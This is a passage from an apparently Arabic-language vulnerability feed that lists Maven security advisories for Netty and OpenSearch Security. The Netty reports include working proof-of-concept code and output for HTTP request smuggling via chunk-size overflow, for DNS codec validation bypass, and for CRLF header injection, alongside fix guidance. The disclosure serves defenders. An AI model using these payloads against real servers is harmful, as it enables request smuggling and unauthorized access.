ch.finishAndReleaseAll(); } // SAFE: HTTP/1.1 correctly strips Content-Length on TE+CL conflict @Test public void http11_contentLengthStripped() { EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder()); ch.writeInbound(Unpooled.copiedBuffer( "POST /api HTTP/1.1\r\n" + "Transfer-Encoding: chunked\r\n" + "Content-Length: 0\r\n" + "\r\n" + "5\r\nGPOST\r\n0\r\n\r\n", CharsetUtil.US_ASCII)); HttpRequest req = ch.readInbound(); assertNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH), "SAFE: CL correctly stripped"); ch.finishAndReleaseAll(); } } ``` --- ## Fix Guidance Remove the `message.protocolVersion() == HttpVersion.HTTP_1_1` guard in `HttpObjectDecoder`, applying `handleTransferEncodingChunkedWithContentLength` unconditionally whenever both `Transfer-Encoding: chunked` and `Content-Length` are present, regardless of protocol version.

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

غير محدد
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Netty's chunk size parser silently overflows int, enabling request smuggling attacks. ### Details io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int. The size is accumulated as follows: result *= 16; result += digit; The result is ch...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary Netty's chunk size parser silently overflows int, enabling request smuggling attacks. ### Details io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int. The size is accumulated as follows: result *= 16; result += digit; The result is checked only for negative values. However, with a carefully crafted chunk size, the result can be a valid size. ### PoC The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body. ```java @Test public void test() { String requestStr = "POST / HTTP/1.1\r\n" + "Host: localhost\r\n" + "Transfer-Encoding: chunked\r\n\r\n" + "100000004\r\n" + "test\r\n" + "0\r\n" + "\r\n" + "GET /smuggled HTTP/1.1\r\n" + "Host: localhost\r\n" + "Content-Length: 0\r\n" + "\r\n"; EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder()); assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII))); // Request 1 HttpRequest request = channel.readInbound(); assertTrue(request.decoderResult().isSuccess()); HttpContent content = channel.readInbound(); assertTrue(content.decoderResult().isSuccess()); assertEquals("test", content.content().toString(CharsetUtil.US_ASCII)); content.release(); LastHttpContent last = channel.readInbound(); assertTrue(last.decoderResult().isSuccess()); last.release(); // Request 2 request = channel.readInbound(); assertTrue(request.decoderResult().isSuccess()); last = channel.readInbound(); assertTrue(last.decoderResult().isSuccess()); last.release(); } ``` ### Impact HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

عالية
📦 io.netty:netty-codec-dns 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # Security Vulnerability Report: DNS Codec Input Validation Bypass in Netty (Encoder + Decoder) ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-dns) | | **Component** | `io.n...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

# Security Vulnerability Report: DNS Codec Input Validation Bypass in Netty (Encoder + Decoder) ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-dns) | | **Component** | `io.netty.handler.codec.dns.DnsCodecUtil` | | **Vulnerability Type** | CWE-20: Improper Input Validation / CWE-626: Null Byte Interaction Error / CWE-400: Uncontrolled Resource Consumption | | **Impact** | DNS Cache Poisoning / Domain Validation Bypass / Denial of Service / Malformed DNS Packets | ## 2. Affected Components Both the encoder and decoder in the same file are affected: - `io.netty.handler.codec.dns.DnsCodecUtil` — `encodeDomainName()` method (lines 31-51): - No null byte validation in domain name labels - No per-label length validation (RFC 1035 max: 63 bytes) - No total domain name length validation (RFC 1035 max: 255 bytes) - Empty labels silently truncate the domain name - `io.netty.handler.codec.dns.DnsCodecUtil` — `decodeDomainName()` method (lines 53-118): - No per-label length validation (max 63) - No total domain name length validation (max 255) - Unbounded StringBuilder growth from attacker-controlled DNS responses ## 3. Vulnerability Description Netty's DNS codec does **not enforce RFC 1035 domain name constraints** during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. ### 3.1 Encoder Side — Null Byte Injection (CWE-626) A domain name containing a null byte (e.g., `"evil\0.example.com"`) is encoded with the null byte embedded in the label data. This creates a domain name that different DNS implementations interpret differently: - **Java (full string)**: sees `"evil\0.example.com"` as a single label containing a null - **C/native DNS libraries**: truncate at the null byte, seeing only `"evil"` - **DNS servers**: may accept or reject based on implementation This differential interpretation enables **DNS cache poisoning** and **domain validation bypass**. ### 3.2 Encoder Side — Overlength Label (RFC 1035 Violation) Labels exceeding 63 bytes are accepted by the encoder. The length byte is written as a single unsigned byte, so a 200-byte label writes `0xC8` (200) as the length. Per RFC 1035, values 192-255 indicate **compression pointers**. This means: - A 200-byte label length `0xC8` would be interpreted as a **compression pointer** by standards-compliant DNS parsers - This creates **parser confusion** between label and pointer interpretation ### 3.3 Encoder Side — Silent Truncation via Empty Labels ```java encodeDomainName("a..b.com", buf); // Encodes as: [01] 'a' [00] // Only "a." is encoded, ".b.com" is silently dropped! ``` An attacker can craft input like `"safe-domain..evil.com"` which gets truncated to just `"safe-domain."`, potentially bypassing domain allowlists. ### 3.4 Decoder Side — Unbounded Memory Allocation The decoder accepts labels of any length (0-255 bytes) without checking the RFC 1035 per-label limit of 63 bytes or the total domain name limit of 255 bytes. A malicious DNS server can return responses with oversized labels, causing excessive memory allocation. ### Root Cause — Encoder ```java // DnsCodecUtil.java:31-51 static void encodeDomainName(String name, ByteBuf buf) { if (ROOT.equals(name)) { buf.writeByte(0); return; } final String[] labels = name.split("\\."); for (String label : labels) { final int labelLen = label.length(); if (labelLen == 0) { break; // NO ERROR - silently truncates! } // NO check: labelLen > 63 // NO check: label contains null bytes // NO check: total name > 255 bytes buf.writeByte(labelLen); // Can write values > 63! ByteBufUtil.writeAscii(buf, label); // Null bytes pass through! } buf.writeByte(0); } ``` ### Root Cause — Decoder ```java // DnsCodecUtil.java:94-99 (decodeDomainName) } else if (len != 0) { if (!in.isReadable(len)) { // Only checks if bytes EXIST, not if len <= 63 throw new CorruptedFrameException("truncated label in a name"); } name.append(in.toString(in.readerIndex(), len, CharsetUtil.UTF_8)).append('.'); // ^^^^^^ StringBuilder grows WITHOUT any length limit in.skipBytes(len); } ``` **Missing checks in decoder**: - No `if (len > 63)` check per RFC 1035 Section 2.3.4 - No `if (name.length() > 255)` check for total domain name length ## 4. Exploitability Prerequisites ### Encoder Side (outbound) 1. An application constructs DNS queries using Netty's DNS codec with user-influenced domain names 2. The constructed DNS packets are sent to DNS servers or resolvers ### Decoder Side (inbound) 1. An application uses Netty's `codec-dns` or `resolver-dns` module to process DNS responses 2. The application communicates with a malicious or compromised DNS server **Attack surface**: Any Netty application using DNS resolution (`DnsNameResolver`) is potentially affected on the decoder side, as DNS responses from the network are attacker-controlled. The encoder side requires user-controlled hostnames. ## 5. Attack Scenarios ### Scenario 1: DNS Cache Poisoning via Null Byte (Encoder) ```java String hostname = userInput; // "evil\0.trusted.com" DnsQuery query = new DefaultDnsQuery(...) .addRecord(DnsSection.QUESTION, new DefaultDnsQuestion(hostname, DnsRecordType.A)); ``` The DNS query for `"evil\0.trusted.com"` may be interpreted by some resolvers as a query for `"evil"` (truncated at null). If the attacker controls the DNS for `"evil"`, they can return a response that gets cached for `"evil\0.trusted.com"` (or vice versa), poisoning the cache. ### Scenario 2: Label/Pointer Confusion (Encoder) A 200-byte label writes length byte `0xC8`. Standards-compliant parsers interpret `0xC0-0xFF` as **compression pointer** prefixes (RFC 1035 Section 4.1.4). The resulting DNS packet is structurally ambiguous: ``` Byte: [C8] [61 61 61 ... (200 bytes)] ↑ Label interpretation: 200-byte label starting with 'a' Pointer interpretation: pointer to offset 0x0861 = 2145 ``` ### Scenario 3: Memory Exhaustion via Large Labels (Decoder) A malicious DNS server returns a response with a 255-byte label (RFC limit: 63). Netty decodes it without error, creating a 260+ character String. With compression pointers, a small DNS response can cause megabytes of StringBuilder allocation. ### Scenario 4: Domain Truncation via Empty Label (Encoder) ```java encodeDomainName("safe-domain..evil.com", buf); // Only "safe-domain." is encoded, "evil.com" silently dropped ``` This can bypass domain allowlists that check the input string. ### Scenario 5: Downstream Processing Failures (Decoder) Applications that pass decoded domain names to other DNS libraries, certificate validators, or URL parsers may crash or behave incorrectly when receiving names > 255 bytes, as these systems typically assume RFC 1035 compliance. ## 6. Proof of Concept ### PoC 1: Encoder Null Byte and Overlength (DnsEncoderNullBytePoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.buffer.Unpooled; import java.lang.reflect.Method; import java.nio.charset.StandardCharsets; public class DnsEncoderNullBytePoC { public static void main(String[] args) throws Exception { System.out.println("=== Netty DNS Encoder Validation Bypass PoC ===\n"); Class<?> clazz = Class.forName("io.netty.handler.codec.dns.DnsCodecUtil"); Method encode = clazz.getDeclaredMethod("encodeDomainName", String.class, ByteBuf.class); encode.setAccessible(true); // Test 1: Null byte in domain name ByteBuf buf = Unpooled.buffer(256); encode.invoke(null, "evil\0.example.com", buf); byte[] bytes = new byte[buf.readableBytes()]; buf.readBytes(bytes); buf.release(); System.out.print("[TEST 1] Null byte - Encoded: "); for (byte b : bytes) System.out.printf("%02x ", b & 0xff); System.out.println("\nVULNERABLE: Null byte 0x00 in label data!"); // Test 2: 200-byte label ByteBuf buf2 = Unpooled.buffer(512); encode.invoke(null, "a".repeat(200) + ".com", buf2); System.out.println("\n[TEST 2] 200-byte label encoded: " + buf2.readableBytes() + " bytes"); System.out.println("VULNERABLE: Overlength label accepted!"); buf2.release(); // Test 3: Empty label truncation ByteBuf buf3 = Unpooled.buffer(256); encode.invoke(null, "a..b.com", buf3); byte[] bytes3 = new byte[buf3.readableBytes()]; buf3.readBytes(bytes3); buf3.release(); System.out.print("\n[TEST 3] Empty label - Encoded: "); for (byte b : bytes3) System.out.printf("%02x ", b & 0xff); System.out.println("\nVULNERABLE: Domain silently truncated!"); } } ``` ### PoC 2: Decoder Length Bypass (DnsDecoderLengthPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.buffer.Unpooled; import java.lang.reflect.Method; import java.nio.charset.StandardCharsets; public class DnsDecoderLengthPoC { public static void main(String[] args) throws Exception { System.out.println("=== Netty DNS Decoder Length Bypass PoC ===\n"); Class<?> clazz = Class.forName("io.netty.handler.codec.dns.DnsCodecUtil"); Method decode = clazz.getDeclaredMethod("decodeDomainName", ByteBuf.class); decode.setAccessible(true); // Test 1: 100-byte label (RFC limit: 63) ByteBuf buf1 = Unpooled.buffer(256); buf1.writeByte(100); buf1.writeBytes("a".repeat(100).getBytes(StandardCharsets.US_ASCII)); buf1.writeByte(3); buf1.writeBytes("com".getBytes(StandardCharsets.US_ASCII)); buf1.writeByte(0); String r1 = (String) decode.invoke(null, buf1); buf1.release(); System.out.println("[TEST 1] 100-byte label: length=" + r1.length() + " VULNERABLE=" + (r1.length() > 64)); // Test 2: 5 x 60-byte labels = 305 bytes (RFC limit: 255) ByteBuf buf2 = Unpooled.buffer(512); for (int i = 0; i < 5; i++) { buf2.writeByte(60); buf2.writeBytes(String.valueOf((char)('a'+i)).repeat(60) .getBytes(StandardCharsets.US_ASCII)); } buf2.writeByte(0); String r2 = (String) decode.invoke(null, buf2); buf2.release(); System.out.println("[TEST 2] 305-byte domain: length=" + r2.length() + " VULNERABLE=" + (r2.length() > 255)); } } ``` ### How to Compile and Run ```bash JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \ | grep -v sources | grep -v javadoc | tr '\n' ':') # Encoder PoC javac -cp "$JARS" DnsEncoderNullBytePoC.java java --add-opens java.base/java.lang=ALL-UNNAMED -cp "$JARS:." DnsEncoderNullBytePoC # Decoder PoC javac -cp "$JARS" DnsDecoderLengthPoC.java java --add-opens java.base/java.lang=ALL-UNNAMED -cp "$JARS:." DnsDecoderLengthPoC ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) **Encoder PoC:** ``` === Netty DNS Encoder Validation Bypass PoC === [TEST 1] Null byte in domain name Input: "evil\0.example.com" Encoded bytes: 05 65 76 69 6c 00 07 65 78 61 6d 70 6c 65 03 63 6f 6d 00 Null byte in label data: true VULNERABLE: YES - Null byte accepted! [TEST 2] Label > 63 bytes in encoder Input: "aaaaaa..." (200-char label) Encoded bytes: 206 VULNERABLE: YES - Overlength label accepted in encoder! [TEST 3] Empty labels (consecutive dots) Input: "a..b.com" Encoded bytes: 01 61 00 Note: Empty label truncates the name (may lose data) ``` **Decoder PoC:** ``` === Netty DNS Decoder Length Bypass PoC === [TEST 1] Label > 63 bytes (RFC 1035 violation) Label length: 100 bytes (RFC limit: 63) Decoded name length: 105 VULNERABLE: YES - Label > 63 bytes accepted! [TEST 2] Domain > 255 bytes via multiple labels 5 labels x 60 bytes = 300+ bytes total RFC 1035 limit: 255 bytes Decoded name length: 305 VULNERABLE: YES - Domain > 255 bytes accepted! ``` ## 7. Impact Analysis | Impact Category | Description | |----------------|-------------| | **Integrity** | HIGH — Null byte injection causes differential interpretation across DNS implementations | | **Availability** | HIGH — Malicious DNS responses can cause unbounded memory allocation via decoder | | **DNS Cache Poisoning** | Different parsers see different domain names from the same encoded packet | | **Domain Validation Bypass** | Null bytes can bypass allowlist/blocklist checks in DNS proxies | | **Label/Pointer Confusion** | Length bytes > 63 conflict with RFC 1035 compression pointer encoding | | **Silent Truncation** | Empty labels silently drop the remainder of the domain name | | **Downstream Failures** | Oversized domain names may crash certificate validators, URL parsers, or other DNS-aware libraries | ## 8. Remediation Recommendations ### Fix for Encoder (encodeDomainName) ```java static void encodeDomainName(String name, ByteBuf buf) { if (ROOT.equals(name)) { buf.writeByte(0); return; } int totalLength = 0; final String[] labels = name.split("\\."); for (String label : labels) { final int labelLen = label.length(); if (labelLen == 0) { throw new IllegalArgumentException("DNS name contains empty label: " + name); } if (labelLen > 63) { throw new IllegalArgumentException( "DNS label length " + labelLen + " exceeds maximum of 63: " + name); } for (int i = 0; i < label.length(); i++) { if (label.charAt(i) == '\0') { throw new IllegalArgumentException( "DNS label contains null byte at index " + i); } } totalLength += 1 + labelLen; if (totalLength > 254) { throw new IllegalArgumentException( "DNS name exceeds maximum length of 255: " + name); } buf.writeByte(labelLen); ByteBufUtil.writeAscii(buf, label); } buf.writeByte(0); } ``` ### Fix for Decoder (decodeDomainName) ```java // Add after "} else if (len != 0) {": if (len > 63) { throw new CorruptedFrameException("DNS label length " + len + " exceeds maximum of 63"); } // Add after "name.append(...)": if (name.length() > 255) { throw new CorruptedFrameException("DNS domain name length exceeds maximum of 255"); } ``` ## 9. Resources - [RFC 1035 Section 2.3.4: Size Limits](https://tools.ietf.org/html/rfc1035#section-2.3.4) - [RFC 1035 Section 4.1.4: Message Compression](https://tools.ietf.org/html/rfc1035#section-4.1.4) - [CWE-20: Improper Input Validation](https://cwe.mitre.org/data/definitions/20.html) - [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html) - [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html)

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

منخفضة
📦 io.netty:netty-handler-proxy 📌 4.1.0.Beta4, 4.1.0.Beta5, 4.1.0.Beta6, 4.1.0.Beta7, 4.1.0.Beta8 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚪ لم تُستغل 🟢 ترقيع
💬 # Security Vulnerability Report: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions) | | **Component** | `io.netty.h...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

# Security Vulnerability Report: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions) | | **Component** | `io.netty.handler.proxy.HttpProxyHandler` | | **Vulnerability Type** | CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers | | **Impact** | HTTP Header Injection in CONNECT Proxy Requests | | **CVSS 3.1 Score** | **7.5 (High)** | | **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` | | **Related Advisory** | **GHSA-84h7-rjj3-6jx4** (Incomplete Fix) | ## 2. Affected Components - `io.netty.handler.proxy.HttpProxyHandler` — `newInitialMessage()` method (line 176) explicitly disables header validation via `withValidation(false)` ## 3. Vulnerability Description Netty's `HttpProxyHandler` constructs HTTP CONNECT requests with **header validation explicitly disabled**. The `newInitialMessage()` method (line 176) creates headers using `DefaultHttpHeadersFactory.headersFactory().withValidation(false)`, then adds user-provided `outboundHeaders` (line 188-190) without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. ### Root Cause ```java // HttpProxyHandler.java:176-190 protected Object newInitialMessage(ChannelHandlerContext ctx) throws Exception { // ... HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory() .withValidation(false); // <-- VALIDATION EXPLICITLY DISABLED FullHttpRequest req = new DefaultFullHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.CONNECT, url, Unpooled.EMPTY_BUFFER, headersFactory, headersFactory); req.headers().set(HttpHeaderNames.HOST, hostHeader); if (authorization != null) { req.headers().set(HttpHeaderNames.PROXY_AUTHORIZATION, authorization); } if (outboundHeaders != null) { req.headers().add(outboundHeaders); // <-- USER HEADERS ADDED WITHOUT VALIDATION } return req; } ``` The `outboundHeaders` parameter comes from the `HttpProxyHandler` constructor (lines 80-93, 99-127), which is supplied by application code. ### Incomplete Fix of GHSA-84h7-rjj3-6jx4 **This vulnerability represents an incomplete fix of the previously acknowledged security advisory [GHSA-84h7-rjj3-6jx4](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4).** The GHSA-84h7-rjj3-6jx4 fix addressed HTTP CRLF injection by adding URI validation via `validateRequestLineTokens()` in `DefaultHttpRequest` and enabling header validation by default through `DefaultHttpHeadersFactory`. However, `HttpProxyHandler` **explicitly opts out** of the fix by calling `withValidation(false)`, creating a gap where: 1. The GHSA-84h7-rjj3-6jx4 fix's header validation is bypassed 2. User-provided `outboundHeaders` are added without any CRLF check 3. The resulting CONNECT request contains unvalidated headers on the wire This is not a new vulnerability class — it is the **same CRLF injection** that GHSA-84h7-rjj3-6jx4 was supposed to fix, but `HttpProxyHandler` was missed during the remediation. The fix for GHSA-84h7-rjj3-6jx4 should be extended to cover this code path. ## 4. Exploitability Prerequisites This vulnerability is exploitable when: 1. An application uses `HttpProxyHandler` with user-influenced `outboundHeaders` 2. The application does not perform its own CRLF sanitization on header values **Common affected patterns**: - HTTP proxy clients that forward user-specified custom headers - Web scraping frameworks that allow users to set proxy headers - API gateways that pass user headers through a proxy tunnel ## 5. Attack Scenarios ### Scenario 1: Proxy Authentication Bypass ```java HttpHeaders headers = new DefaultHttpHeaders(false); headers.set("X-Forwarded-For", userInput); // userInput from attacker new HttpProxyHandler(proxyAddr, headers); ``` **Attack input**: `userInput = "1.2.3.4\r\nProxy-Authorization: Basic YWRtaW46YWRtaW4="` **Wire format**: ``` CONNECT target.com:443 HTTP/1.1 host: target.com:443 X-Forwarded-For: 1.2.3.4 Proxy-Authorization: Basic YWRtaW46YWRtaW4= <-- INJECTED ``` The injected `Proxy-Authorization` header may override or supplement the original authentication, potentially granting access to a restricted proxy. ### Scenario 2: Request Smuggling via Proxy **Attack input**: `userInput = "value\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /internal HTTP/1.1\r\nHost: internal-service"` Injects a full smuggled request through the proxy tunnel establishment. ## 6. Proof of Concept ### Full Runnable PoC Source Code (HttpProxyHeaderInjectionPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.channel.embedded.EmbeddedChannel; import io.netty.handler.codec.http.*; import java.nio.charset.StandardCharsets; public class HttpProxyHeaderInjectionPoC { public static void main(String[] args) { System.out.println("=== Netty HttpProxyHandler Header Injection PoC ===\n"); // Simulate HttpProxyHandler.newInitialMessage() with validation=false HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory() .withValidation(false); FullHttpRequest req = new DefaultFullHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.CONNECT, "target.com:443", io.netty.buffer.Unpooled.EMPTY_BUFFER, headersFactory, headersFactory); req.headers().set(HttpHeaderNames.HOST, "target.com:443"); // Inject CRLF in header value String malicious = "1.2.3.4\r\nX-Forwarded-For: 127.0.0.1\r\nX-Admin: true"; req.headers().set("X-Forwarded-For", malicious); // Encode to wire format EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestEncoder()); ch.writeOutbound(req); ByteBuf out = ch.readOutbound(); String encoded = out.toString(StandardCharsets.UTF_8); out.release(); ch.finishAndReleaseAll(); System.out.println("Wire format:"); for (String line : encoded.split("\n", -1)) { System.out.println(" " + line.replace("\r", "\\r")); } System.out.println("Injected X-Admin: " + encoded.contains("X-Admin: true")); System.out.println("VULNERABLE: " + (encoded.contains("X-Admin: true") ? "YES" : "NO")); } } ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) ``` === Netty HttpProxyHandler Header Injection PoC === [TEST 1] outboundHeaders with CRLF (validation disabled) ---------------------------------------------------------- Injected header value: "1.2.3.4\r\nX-Forwarded-For: 127.0.0.1\r\nX-Admin: true" Header accepted: YES (validation disabled!) Wire format: CONNECT target.com:443 HTTP/1.1\r host: target.com:443\r X-Forwarded-For: 1.2.3.4\r X-Forwarded-For: 127.0.0.1\r <-- INJECTED X-Admin: true\r <-- INJECTED \r Injected X-Admin header in wire: true VULNERABLE: YES [TEST 2] validation=true vs validation=false comparison -------------------------------------------------------- With validation=true: SAFE: Rejected - IllegalArgumentException With validation=false: VULNERABLE: Accepted CRLF in header value! Stored value contains CRLF: true ``` ## 7. Remediation Recommendations ### Option 1: Remove withValidation(false) ```java // Change HttpProxyHandler.java line 176 from: HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory().withValidation(false); // To: HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory(); ``` ### Option 2: Validate outboundHeaders Before Adding ```java if (outboundHeaders != null) { for (Map.Entry<String, String> entry : outboundHeaders) { HttpUtil.validateHeaderValue(entry.getValue()); } req.headers().add(outboundHeaders); } ``` ## 8. Resources - [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection (**incomplete fix — this report**)](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4) - [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers](https://cwe.mitre.org/data/definitions/113.html)

الإصدارات المتأثرة

4.1.0.Beta4, 4.1.0.Beta5, 4.1.0.Beta6, 4.1.0.Beta7, 4.1.0.Beta8

منخفضة
📦 org.opensearch.plugin:opensearch-security 📌 2.18.0.0, 2.19.0.0, 2.19.1.0, 2.19.2.0, 2.19.3.0 📝 إدارة محتوى ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Description A regression was introduced in OpenSearch 2.18.0 that caused the `plugins.security.ssl.transport.enforce_hostname_verification` setting to be ineffective. When this setting was enabled, OpenSearch did not verify that the hostname in a connecting node's TLS certif...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Description A regression was introduced in OpenSearch 2.18.0 that caused the `plugins.security.ssl.transport.enforce_hostname_verification` setting to be ineffective. When this setting was enabled, OpenSearch did not verify that the hostname in a connecting node's TLS certificate matched the hostname of the connection. This could allow a node with a valid certificate (signed by the cluster's trusted CA) but an incorrect hostname SAN to join the cluster. ### Impact Clusters running affected versions with hostname verification enabled did not receive the expected protection from this setting. A node presenting a certificate signed by the cluster's trusted CA could join the cluster regardless of whether its hostname SAN matched. This regression does not affect certificate validation itself — only the additional hostname verification check. ### Patches This issue is fixed in OpenSearch 2.19.4 and 3.3.0. ### Workarounds Use more restrictive values for `plugins.security.nodes_dn` to limit which certificates are accepted for node-to-node communication.

الإصدارات المتأثرة

2.18.0.0, 2.19.0.0, 2.19.1.0, 2.19.2.0, 2.19.3.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

غير محدد
📦 org.opensearch.plugin:opensearch-security 📌 2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0 📝 إدارة محتوى ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Description A flaw was identified in the OpenSearch Security plugin's document-level security (DLS) implementation. DLS restrictions were not correctly applied to search queries that use has_parent or has_child join relations. This could allow an authenticated user to access...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Description A flaw was identified in the OpenSearch Security plugin's document-level security (DLS) implementation. DLS restrictions were not correctly applied to search queries that use has_parent or has_child join relations. This could allow an authenticated user to access document contents that should have been restricted by DLS rules. ### Impact An authenticated user with access to an index containing parent/child join relations could bypass DLS restrictions on documents linked by those relations, potentially accessing restricted document contents. This only affects clusters that use both DLS and the `join` field type on the same index. ### Patches This issue is fixed in OpenSearch `2.19.4` and `3.2.0`. ### Workarounds Avoid using the `join` field type on indices that are subject to DLS rules.

الإصدارات المتأثرة

2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

منخفضة
📦 org.opensearch.plugin:opensearch-security 📌 2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0 📝 إدارة محتوى ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Description A flaw was identified in the OpenSearch Security plugin's handling of index rollover requests. When a rollover request included an explicit target index name, the security plugin did not properly evaluate access control permissions against the target index. This ...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Description A flaw was identified in the OpenSearch Security plugin's handling of index rollover requests. When a rollover request included an explicit target index name, the security plugin did not properly evaluate access control permissions against the target index. This could allow a user with rollover permissions on a source index to create a new index with a name they are not authorized to use. ### Impact A user with `indices:admin/rollover` permission on a source index pattern could roll over to a target index name outside their authorized index patterns. This is limited to index creation via the rollover API and requires the user to already have rollover privileges on the source index. ### Patches This issue is fixed in OpenSearch 2.19.4 and 3.2.0 ### Workarounds Grant the `indices:admin/rollover` permission only to fully trusted users.

الإصدارات المتأثرة

2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

منخفضة
📦 org.opensearch.plugin:opensearch-security 📌 2.11.0.0, 2.11.1.0, 2.12.0.0, 2.13.0.0, 2.14.0.0 📝 إدارة محتوى ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Description A flaw was identified in the OpenSearch REST layer that could allow authorization checks to be bypassed when processing certain malformed HTTP requests. This could permit unauthorized access to restricted API endpoints in environments that rely on REST-layer auth...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Description A flaw was identified in the OpenSearch REST layer that could allow authorization checks to be bypassed when processing certain malformed HTTP requests. This could permit unauthorized access to restricted API endpoints in environments that rely on REST-layer authorization. Transport-level authorization is not affected by this issue. ### Impact The default OpenSearch distribution is not affected by this issue. REST actions in the default distribution have corresponding transport actions that independently enforce authorization. Custom plugins that register REST actions without a corresponding transport action may be affected, potentially allowing unauthorized read access to those endpoints. ### Patches This issue is fixed in OpenSearch 2.19.0. Users should upgrade to 2.19.0 or later.

الإصدارات المتأثرة

2.11.0.0, 2.11.1.0, 2.12.0.0, 2.13.0.0, 2.14.0.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

غير محدد
📦 io.awspring.cloud:spring-cloud-aws-sns 📌 4.0.0, 4.0.1 🗄️ سيرفر ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
